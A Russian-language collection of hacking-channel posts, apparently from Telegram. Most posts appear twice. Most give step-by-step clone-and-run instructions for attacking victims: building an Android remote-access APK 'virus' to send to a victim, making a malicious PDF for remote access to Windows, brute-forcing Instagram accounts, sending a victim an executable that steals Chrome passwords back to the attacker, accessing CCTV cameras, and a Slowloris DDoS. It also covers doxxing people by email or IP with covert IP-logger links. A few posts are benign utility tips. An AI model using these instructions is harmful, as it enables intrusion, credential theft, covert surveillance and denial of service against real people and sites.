Пробив человека по почте
В данном посте пойдёт речь про сервисы для осуществления OSINT разведки, т.е пробив, имея из данных только почту, все сервисы функционируют.
1. haveibeenpwned.com — проверка почты в слитых базах.
2. emailrep.io — найдет на каких сайтах был зарегистрирован аккаунт использующий определенную почту.
3. dehashed.com — проверка почты в слитых базах.
4. intelx.io — многофункциональный поисковик, поиск осуществляется еще и по даркнету.
5. @info_baza_bot — покажет из какой базы слита почта, 2 бесплатных скана.
6. leakedsource.ru — покажет в каких базах слита почта.
7. mostwantedhf.info — найдет аккаунт skype.
В данном посте пойдёт речь про сервисы для осуществления OSINT разведки, т.е пробив, имея из данных только почту, все сервисы функционируют.
1. haveibeenpwned.com — проверка почты в слитых базах.
2. emailrep.io — найдет на каких сайтах был зарегистрирован аккаунт использующий определенную почту.
3. dehashed.com — проверка почты в слитых базах.
4. intelx.io — многофункциональный поисковик, поиск осуществляется еще и по даркнету.
5. @info_baza_bot — покажет из какой базы слита почта, 2 бесплатных скана.
6. leakedsource.ru — покажет в каких базах слита почта.
7. mostwantedhf.info — найдет аккаунт skype.
Как взломать телефон на Android?
В данном посте мы разберём утилиту, которая является пакетом удалённого управления Android под названием «L3MON» . L3MON - это облачный пакет для удалённого управления Android.
Установка:
$
$ cd L3MON
$
$
$
Использование:
$
$
Далее понадобится изменить пароль шифрования хэша MD5 и поместить его в файл конфигурации для защиты панели администратора.
$
$
Запустите localhost в браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа.
В данном посте мы разберём утилиту, которая является пакетом удалённого управления Android под названием «L3MON» . L3MON - это облачный пакет для удалённого управления Android.
Установка:
$
git clone https://github.com/D3VL/L3MON.git $ cd L3MON
$
cd server$
npm install$
npm audit fixИспользование:
$
pm2 start index.js$
pm2 startupДалее понадобится изменить пароль шифрования хэша MD5 и поместить его в файл конфигурации для защиты панели администратора.
$
echo -n "12345" | md5sum$
nano maindb.jsonЗапустите localhost в браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа.
Как взломать ПК через PDF файл?
Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.
Установка:
$
$
$
$
Использование:
$
При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.
Установка:
$
git clone https://github.com/4w4k3/Insanity-Framework$
cd Insanity-Framework$
chmod +x insanity.py$
./install.shИспользование:
$
sudo python2 insanity.pyПри первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
❤2
Как узнать, кто брал ваш телефон?
Мобильный телефон - частная собственность, просматривать его содержимое можно только с разрешения владельца. Но как быть уверенным в том, что окружающие вас люди также уважают личные границы других, как и вы?
Есть секретный способ узнать, кто брал телефон в руки в ваше отсутствие. WTMP - приложение для Android, которое незаметно в фоновом режиме сделает фото пользователя каждый раз, когда кто-то входит в телефон, даже если попытка ввода пароля оказывается неудачной.
В случае успешного входа в телефон, утилита сможет составить список запущенных приложений. Отчеты можно просматривать в самой программе, а также можно настроить синхронизацию с Google-диском.
▫️Скачать
Мобильный телефон - частная собственность, просматривать его содержимое можно только с разрешения владельца. Но как быть уверенным в том, что окружающие вас люди также уважают личные границы других, как и вы?
Есть секретный способ узнать, кто брал телефон в руки в ваше отсутствие. WTMP - приложение для Android, которое незаметно в фоновом режиме сделает фото пользователя каждый раз, когда кто-то входит в телефон, даже если попытка ввода пароля оказывается неудачной.
В случае успешного входа в телефон, утилита сможет составить список запущенных приложений. Отчеты можно просматривать в самой программе, а также можно настроить синхронизацию с Google-диском.
▫️Скачать
Новый пробив человека по IP
IPdrone - это инструмент сбора информации, который позволяет вам узнайте чье-лиюо местоположение, всего-лишь зная его белый IP-адрес. Данный инструмент является инструментом IP-поиска, который позволит вам получить большую часть информации о конкретном IP-адресе используя Termux.
Установка:
$
$
Использование:
$
Если вы перезапустите termux, то вам нужно сначала изменить свой каталог на папку IPdrone. Вместо IP-адреса вам просто будет необходимо ввести IP-адрес человека, о котором вы пытаетесь собрать информацию.
IPdrone - это инструмент сбора информации, который позволяет вам узнайте чье-лиюо местоположение, всего-лишь зная его белый IP-адрес. Данный инструмент является инструментом IP-поиска, который позволит вам получить большую часть информации о конкретном IP-адресе используя Termux.
Установка:
$
git clone https://github.com/noob-hackers/ipdrone$
cd ipdroneИспользование:
$
python ipdrone.py -v IP-адрес Если вы перезапустите termux, то вам нужно сначала изменить свой каталог на папку IPdrone. Вместо IP-адреса вам просто будет необходимо ввести IP-адрес человека, о котором вы пытаетесь собрать информацию.
Как заработать от 1000 рублей в день?
Всем привет! Сегодняшний пост больше ориентирован на тех, кто не хочет заморачиваться с реализацией довольно сложных тем, на тех, кому будет достаточно и 1000 - 3000 рублей в день. На яхту или майбах вы вряд ли заработаете, но вот на повседневные нужды или стартовый капитал для более серьезных тем - легко.
Читать статью
Всем привет! Сегодняшний пост больше ориентирован на тех, кто не хочет заморачиваться с реализацией довольно сложных тем, на тех, кому будет достаточно и 1000 - 3000 рублей в день. На яхту или майбах вы вряд ли заработаете, но вот на повседневные нужды или стартовый капитал для более серьезных тем - легко.
Читать статью
Telegraph
Как зарабатывать от 1000 рублей в день?
Приветствую вас, семья! Сегодняшний пост больше ориентирован на тех, кто не хочет заморачиваться с реализацией довольно сложных, но профитных тем, на тех, кому будет достаточно и 1000 - 3000 рублей в день. На яхту или майбах вы вряд ли заработаете, но вот…
👍1
Отключаем все трекеры в приложениях
Отслеживающие трекеры, собирающие информацию о вашем поведении, есть не только на веб-сайтах, но и в установленных приложениях на вашем смартфоне. И если сайты вас хоть как-то предупреждают об отслеживании, узнать о трекерах в приложениях не так уж и просто.
TrackerControl - это приложение для Android, которое позволяет пользователям узнать какие конкретно технологии отслеживания присутствуют в коде ваших приложений. Сервис позволяет выявлять компании, стоящие за отслеживанием и раскрывать их цели, такие как аналитика или реклама.
Разработчики заявляют, что приложение всегда будет бесплатным с открытым исходным кодом, так как это в первую очередь исследовательский проект. Разработка ведется при поддержке отделения компьютерных наук Оксфорда. Исходный код проекта доступен на GitHub.
▫️https://trackercontrol.org/
Отслеживающие трекеры, собирающие информацию о вашем поведении, есть не только на веб-сайтах, но и в установленных приложениях на вашем смартфоне. И если сайты вас хоть как-то предупреждают об отслеживании, узнать о трекерах в приложениях не так уж и просто.
TrackerControl - это приложение для Android, которое позволяет пользователям узнать какие конкретно технологии отслеживания присутствуют в коде ваших приложений. Сервис позволяет выявлять компании, стоящие за отслеживанием и раскрывать их цели, такие как аналитика или реклама.
Разработчики заявляют, что приложение всегда будет бесплатным с открытым исходным кодом, так как это в первую очередь исследовательский проект. Разработка ведется при поддержке отделения компьютерных наук Оксфорда. Исходный код проекта доступен на GitHub.
▫️https://trackercontrol.org/
Как сделать второй монитор из Android
Не все знают, но ваш планшет или смартфон на Android можно легко использовать как второй монитор для компьютера на Windows. Причем речь не об удаленном доступе, а именно о полноценном втором мониторе, на который можно выводить отдельное изображение.
Программа SpaceDesk позволяет без труда настроить Android устройство в качестве второго монитора. Использовать это удобно, если вы работаете с графикой или занимаетесь разработкой приложений.
Настроить второй монитор просто:
1. На устройство Android установите бесплатное приложение SpaceDesk.
2. Скачайте и установите программу для Windows с официального сайта на свой компьютер.
3. Запустите программу на компьютере и приложение на планшете или смартфоне.
4. Приложение начнет автоматически искать сервер, подключенный к той же сети. Выберите из предложенного списка ваш компьютер и нажмите «Connection».
▫️https://www.spacedesk.net/
Не все знают, но ваш планшет или смартфон на Android можно легко использовать как второй монитор для компьютера на Windows. Причем речь не об удаленном доступе, а именно о полноценном втором мониторе, на который можно выводить отдельное изображение.
Программа SpaceDesk позволяет без труда настроить Android устройство в качестве второго монитора. Использовать это удобно, если вы работаете с графикой или занимаетесь разработкой приложений.
Настроить второй монитор просто:
1. На устройство Android установите бесплатное приложение SpaceDesk.
2. Скачайте и установите программу для Windows с официального сайта на свой компьютер.
3. Запустите программу на компьютере и приложение на планшете или смартфоне.
4. Приложение начнет автоматически искать сервер, подключенный к той же сети. Выберите из предложенного списка ваш компьютер и нажмите «Connection».
▫️https://www.spacedesk.net/
👍1
Как взломать Instagram в несколько кликов?
В данном посте пойдёт речь про осуществление атаки на аккаунт в социальной сети Instagram, путем перебора пароля. Данную атаку сможет провести даже обычный школьник.
Для проведения подобной атаки, достаточно следовать простой инструкции:
Установка:
$
$
$
Использование:
$
$
Далее введите Юзернейм аккаунта Instagram и путь до словаря паролей.
В данном посте пойдёт речь про осуществление атаки на аккаунт в социальной сети Instagram, путем перебора пароля. Данную атаку сможет провести даже обычный школьник.
Для проведения подобной атаки, достаточно следовать простой инструкции:
Установка:
$
git clone https://github.com/tiptoettt/instashell$
cd instashell$
chmod +x instashell.shИспользование:
$
service tor start$
./instashell.shДалее введите Юзернейм аккаунта Instagram и путь до словаря паролей.
Как украсть пароли из аккаунта в Google
Большинство пользователей хранит свои пароли прямо в браузере, в так называемых "формах автозаполнения" Chrome.
ChromePass - это специализированная утилита, написанная на языке программирования Python, способная "добывать" сохраненные пароли в Chrome.
Установка:
$
$
$
$
$
Использование:
$
После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение. Файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.
Большинство пользователей хранит свои пароли прямо в браузере, в так называемых "формах автозаполнения" Chrome.
ChromePass - это специализированная утилита, написанная на языке программирования Python, способная "добывать" сохраненные пароли в Chrome.
Установка:
$
git clone https://github.com/bierschi/chromepass$
cd chromepass$
pip install -r requirements.txt$
python -m pip install --upgrade pip$
python -m pip install -r requirements.txt
Использование:
$
python create_server.pyПосле запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение. Файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.
Как скрыть свои действия от Google и убрать слежку?
Американская корпорация собирает о вас множество данных, но пользоваться ее экосистемой очень удобно. Если вас не пугает накопление сведений и вы пользуетесь сервисами компании, есть простой способ защитить историю ваших действий от посторонних глаз.
Google предлагает возможность поставить пароль на историю ваших действий, тогда при попытке ее просмотра или удаления, будет требоваться подтверждение личности. Это повысит уровень защиты данных на общих устройствах.
Чтобы активировать защиту, перейдите по ссылке в раздел «Мои действия в Google» → найдите опцию «Настроить проверку для доступа к истории моих действий» → выберите «Включить дополнительную проверку» и подтвердите свою личность.
▫️Ссылка
Американская корпорация собирает о вас множество данных, но пользоваться ее экосистемой очень удобно. Если вас не пугает накопление сведений и вы пользуетесь сервисами компании, есть простой способ защитить историю ваших действий от посторонних глаз.
Google предлагает возможность поставить пароль на историю ваших действий, тогда при попытке ее просмотра или удаления, будет требоваться подтверждение личности. Это повысит уровень защиты данных на общих устройствах.
Чтобы активировать защиту, перейдите по ссылке в раздел «Мои действия в Google» → найдите опцию «Настроить проверку для доступа к истории моих действий» → выберите «Включить дополнительную проверку» и подтвердите свою личность.
▫️Ссылка
Моментально удаляем все данные с телефона
Перед продажей устройства всегда возникает необходимость в полном очищение хранилища от личных данных. Доверять заводскому сбросу настроек не стоит, ведь в интернете полно способов восстановления файлов.
Можно воспользоваться сторонними помощниками, например приложением Extirpater, которое уничтожит все данные на Android-устройстве без возможности восстановления. Перед применением стоит помнить, что подобные утилиты при частом использовании разрушают накопитель гаджета.
Алгоритм очищения достаточно прост, но эффективен: при стандартном удалении данных, файлы не уничтожаются, а лишь исчезают из индекса файловой системы. Данный же инструмент заполняет оставшееся пространство диска случайным шумом, а затем все начисто очищает.
▫️https://gitlab.com/divested-mobile/extirpater
Перед продажей устройства всегда возникает необходимость в полном очищение хранилища от личных данных. Доверять заводскому сбросу настроек не стоит, ведь в интернете полно способов восстановления файлов.
Можно воспользоваться сторонними помощниками, например приложением Extirpater, которое уничтожит все данные на Android-устройстве без возможности восстановления. Перед применением стоит помнить, что подобные утилиты при частом использовании разрушают накопитель гаджета.
Алгоритм очищения достаточно прост, но эффективен: при стандартном удалении данных, файлы не уничтожаются, а лишь исчезают из индекса файловой системы. Данный же инструмент заполняет оставшееся пространство диска случайным шумом, а затем все начисто очищает.
▫️https://gitlab.com/divested-mobile/extirpater
👍1
Быстрый пробив по IP
Если вы общаетесь с злоумышленником и хотите его напугать - есть лайфхак, как узнать его публичный IP даже без компьютера. Или пранкануть друзей. Для этого существует много сервисов, которые регистрируют каждого посетителя вашей ссылки.
IP Logger - с помощью данного сервиса вы создадите и отправите ссылку, которая отследит IP, браузер, ОС и местоположение человека — и он не узнает об этом. Как это сделать: выбираем файл для отправки и вставляем его ссылку на сайт.
Выбираем любой не вызывающий подозрений домен и желаемое расширение картинки. Теперь под «Ваша ссылка для сбора IP-адресов» копируем получившуюся ссылку и отправляем человеку.
▫️https://iplogger.ru/
Если вы общаетесь с злоумышленником и хотите его напугать - есть лайфхак, как узнать его публичный IP даже без компьютера. Или пранкануть друзей. Для этого существует много сервисов, которые регистрируют каждого посетителя вашей ссылки.
IP Logger - с помощью данного сервиса вы создадите и отправите ссылку, которая отследит IP, браузер, ОС и местоположение человека — и он не узнает об этом. Как это сделать: выбираем файл для отправки и вставляем его ссылку на сайт.
Выбираем любой не вызывающий подозрений домен и желаемое расширение картинки. Теперь под «Ваша ссылка для сбора IP-адресов» копируем получившуюся ссылку и отправляем человеку.
▫️https://iplogger.ru/
👍1
Как взломать камеру с помощью Termux?
В данном посте будет представлена утилита, способная спарсить и получить доступ к камерам видеонаблюдения. Парсинг представляет собой процесс сбора данных с последующей их обработкой и анализом.
Установка:
$
$
$
$
$
Использование:
$
После ввода данной команды выбираем страну и утилита нам выдаст IP камер. Теперь можно вставлять полученные IP в браузер и просматривать. Половина камер из списка под паролем.
В данном посте будет представлена утилита, способная спарсить и получить доступ к камерам видеонаблюдения. Парсинг представляет собой процесс сбора данных с последующей их обработкой и анализом.
Установка:
$
apt install python3 $
apt install git$
git clone https://github.com/yan4ikyt/webhack$
cd webhack$
bash install.shИспользование:
$
python WebHack.pyПосле ввода данной команды выбираем страну и утилита нам выдаст IP камер. Теперь можно вставлять полученные IP в браузер и просматривать. Половина камер из списка под паролем.
👍2
Пробив человека по социальным сетям
Это достаточно классный лайфхак, чтобы пробить аккаунт по всем соцсетям, мессенджерам и популярным сервисам.
Namechk - сервис, способный за пару минут найдёт по никнейму все аккаунты человека, а вручную поиск занял бы не меньше часа.Вводите юзернейм разыскиваемого человека и нажимаете на иконку лупы.
На экране появится несколько десятков логотипов сайтов, причём все - с разным цветом. Если цвет зелёный, пользователя с таким ником не существует. Красный - не получилось найти. Жёлтый - недействителен. Серый - аккаунт найден! По клику прямая ссылка на него.
Namechk ищет не только по популярным соцсетям, но и по менее известным — например, Tripit, Product Hunt, Kongregate, Mixcloud и другие. Это уже полезно для айтишников.
▫️https://namechk.com/
Это достаточно классный лайфхак, чтобы пробить аккаунт по всем соцсетям, мессенджерам и популярным сервисам.
Namechk - сервис, способный за пару минут найдёт по никнейму все аккаунты человека, а вручную поиск занял бы не меньше часа.Вводите юзернейм разыскиваемого человека и нажимаете на иконку лупы.
На экране появится несколько десятков логотипов сайтов, причём все - с разным цветом. Если цвет зелёный, пользователя с таким ником не существует. Красный - не получилось найти. Жёлтый - недействителен. Серый - аккаунт найден! По клику прямая ссылка на него.
Namechk ищет не только по популярным соцсетям, но и по менее известным — например, Tripit, Product Hunt, Kongregate, Mixcloud и другие. Это уже полезно для айтишников.
▫️https://namechk.com/
👍1
Создаём фейковую личность в интернете
Я советую завести привычку - не регистрироваться на сомнительных сайтах на свои реальные данные. Вбивайте несуществующие, и делайте это красиво.
Randus - данный сервис создаёт рандомные личности каждый раз, когда вы обновляете страницу. Генератор случайным образом придумает ФИО, дату рождения, адрес, номер телефона, логин и пароль. Даже сгенерирует лицо несуществующего человека с помощью нейросетей.
Вам остаётся только скопировать все эти данные и вставить в поля регистрации на сайте. Также есть вариант попроще: установить для Chrome, которое автоматически заполнит все необходимые поля за вас.
▫️https://randus.org/
Я советую завести привычку - не регистрироваться на сомнительных сайтах на свои реальные данные. Вбивайте несуществующие, и делайте это красиво.
Randus - данный сервис создаёт рандомные личности каждый раз, когда вы обновляете страницу. Генератор случайным образом придумает ФИО, дату рождения, адрес, номер телефона, логин и пароль. Даже сгенерирует лицо несуществующего человека с помощью нейросетей.
Вам остаётся только скопировать все эти данные и вставить в поля регистрации на сайте. Также есть вариант попроще: установить для Chrome, которое автоматически заполнит все необходимые поля за вас.
▫️https://randus.org/
Блокируем всплывающие окна на сайтах
Даже если вы не ненавидите интернет-рекламу, навязчивые всплывающие окна, мешающие комфортному серфингу в интернете, уж точно не нравятся никому. Эти рекламные материалы всегда только мешают пользователям получать доступ к онлайн-контенту.
Расширение Poper Blocker для Chrome и Firefox - самый мощный блокировщик всплывающих окон. Инструмент автоматически и эффективно блокирует все всплывающие окна с рекламой, новыми вкладками и оверлеи (всплывающие окна, закрывающие содержимое страницы).
Poper Blocker очень прост в использовании. Фактически, вам не нужно ничего делать, чтобы работать с ним, поскольку он без проблем работает в фоновом режиме. Ненавязчивые уведомления сообщат вам, когда всплывающее окно или оверлей были заблокированы.
▫️https://poperblocker.com/
Даже если вы не ненавидите интернет-рекламу, навязчивые всплывающие окна, мешающие комфортному серфингу в интернете, уж точно не нравятся никому. Эти рекламные материалы всегда только мешают пользователям получать доступ к онлайн-контенту.
Расширение Poper Blocker для Chrome и Firefox - самый мощный блокировщик всплывающих окон. Инструмент автоматически и эффективно блокирует все всплывающие окна с рекламой, новыми вкладками и оверлеи (всплывающие окна, закрывающие содержимое страницы).
Poper Blocker очень прост в использовании. Фактически, вам не нужно ничего делать, чтобы работать с ним, поскольку он без проблем работает в фоновом режиме. Ненавязчивые уведомления сообщат вам, когда всплывающее окно или оверлей были заблокированы.
▫️https://poperblocker.com/
DDoS сайта с помощью Termux
В данном посте пойдёт речь про осуществление DDoS-атаки на сайт с помощью одной интересной утилиты.
Slowloris — инструмент для DDoS-атак с низкой пропускной способностью. Программное обеспечение переписано на Python и выполняет атаку отказа в обслуживании HTTP, которая замедляет работу небольших серверов или приводит к их сбою.
Установка:
$
$
Использование:
$
После выполнения данной команды будет открыто небольшое меню, в котором нужно выбрать параметры и указать IP сайта на который будет осуществлена атака.
В данном посте пойдёт речь про осуществление DDoS-атаки на сайт с помощью одной интересной утилиты.
Slowloris — инструмент для DDoS-атак с низкой пропускной способностью. Программное обеспечение переписано на Python и выполняет атаку отказа в обслуживании HTTP, которая замедляет работу небольших серверов или приводит к их сбою.
Установка:
$
git clone https://github.com/gkbrk/slowloris.git$
cd slowlorisИспользование:
$
python3 slowloris.pyПосле выполнения данной команды будет открыто небольшое меню, в котором нужно выбрать параметры и указать IP сайта на который будет осуществлена атака.